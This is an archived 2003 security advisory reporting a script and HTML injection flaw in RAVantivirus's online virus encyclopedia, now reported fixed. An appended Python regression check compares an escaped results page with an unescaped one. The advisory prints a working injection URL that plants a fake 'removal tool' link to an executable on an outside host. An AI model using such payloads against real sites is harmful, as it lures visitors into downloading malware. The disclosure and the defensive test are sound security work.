Message-ID: <199096299.20030904093646@kryptocrew.de>
From: momolly at kryptocrew.de (Redaktion-Kryptocrew)
Subject: [Update]: Code executing in RAV's virus encyclopedia fixed
Vulnerability: Code executing in RAV's virus encyclopedia
Found: 30 Aug 2003
Vendor: RAVantivirus
Vendor notified: 03 Sept 2003
Vendor response: no
Public release: 04 Sept 2003
A further crazy leak:
RAV's virus encyclopedia also gives attackers the possibility to inject even
harmful scripts.
RAVantivirus overlooked this fault in their virus information websites.
[Example]:
http://www.ravantivirus.com/virus/by-keyword.php?k=Sobig<br><br><b>if%20you%20recieve%20a%20error%20above%20you%20must</b><br><h3><a%20href=http://www.kryptocrew.de/badfile.exe>download%20this%20removal%20tool!%20NOW!!!</a><br>testing%20your%20saftey...%20%20test
[Update]:
RAV fixed
Thanks to:
Donnie Werner (exploitlabs.com), Roland Brecht (kryptocrew.de) & Alexander Mueller
(ec-security.com)
Regards
G.P
--
======================================================================
G.P.
Online-Redaktion
===============================
Kryptocrew http://www.kryptocrew.de
.: your security advisor team :. mailto:momolly@...ptocrew.de
======================================================================
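The following is an added example, not part of the original post and not RAV's code. It decodes the `k` value from the example URL in the advisory and compares a page that echoes it as-is with one that output-encodes it, as a regression check for this class of fault. The template and all function names are hypothetical, and the advisory does not say how RAV actually fixed the page.

```python
import html
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Example URL exactly as posted in the advisory above.
ADVISORY_URL = (
    "http://www.ravantivirus.com/virus/by-keyword.php?k=Sobig<br><br><b>if%20you"
    "%20recieve%20a%20error%20above%20you%20must</b><br><h3><a%20href=http://www."
    "kryptocrew.de/badfile.exe>download%20this%20removal%20tool!%20NOW!!!</a><br>"
    "testing%20your%20saftey...%20%20test"
)
# Hypothetical results-page template (an assumption, not RAV's markup).
TEMPLATE = "<p>Search results for keyword: {keyword}</p>"

def keyword_from(url):
    # Percent-decode the k parameter the way a web stack hands it to the page.
    return parse_qs(urlsplit(url).query)["k"][0]

def render_unescaped(keyword):
    # Assumed pre-fix behaviour: the decoded value is echoed into the page as-is.
    return TEMPLATE.format(keyword=keyword)

def render_escaped(keyword):
    # Output-encode the value so the browser treats it as text, not markup.
    return TEMPLATE.format(keyword=html.escape(keyword, quote=True))

class _StartTags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def start_tags(markup):
    parser = _StartTags()
    parser.feed(markup)
    parser.close()
    return parser.tags

def injected_tags(render, keyword):
    # Tags in the rendered page beyond those of a plain "Sobig" search.
    extra = Counter(start_tags(render(keyword))) - Counter(start_tags(render("Sobig")))
    return sorted(extra.elements())

if __name__ == "__main__":
    k = keyword_from(ADVISORY_URL)
    print("unescaped:", injected_tags(render_unescaped, k))
    print("escaped:  ", injected_tags(render_escaped, k))
```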